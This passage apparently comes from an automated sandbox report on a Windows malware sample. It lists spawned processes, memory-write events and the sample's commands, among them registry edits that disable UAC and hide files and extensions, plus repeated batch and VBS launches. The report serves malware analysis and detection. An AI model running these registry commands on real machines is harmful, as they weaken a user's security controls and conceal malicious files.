N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A
N/A N/A C:\Users\Admin\lKwcEkEY\gwooEwMc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Users\Admin\lKwcEkEY\gwooEwMc.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\ProgramData\xGYksgIk\mucsYUUU.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 3732 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 904 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4560 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 3732 wrote to memory of 1612 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2356 wrote to memory of 3224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 5024 wrote to memory of 4760 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 4636 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1436 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 1788 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1612 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 2676 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cscript.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 4760 wrote to memory of 1172 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 1172 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\reg.exe
PID 4760 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

"C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe"

C:\Users\Admin\lKwcEkEY\gwooEwMc.exe

"C:\Users\Admin\lKwcEkEY\gwooEwMc.exe"

C:\ProgramData\xGYksgIk\mucsYUUU.exe

"C:\ProgramData\xGYksgIk\mucsYUUU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tWIgoUsg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dOIwMQgI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xckEkAsg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

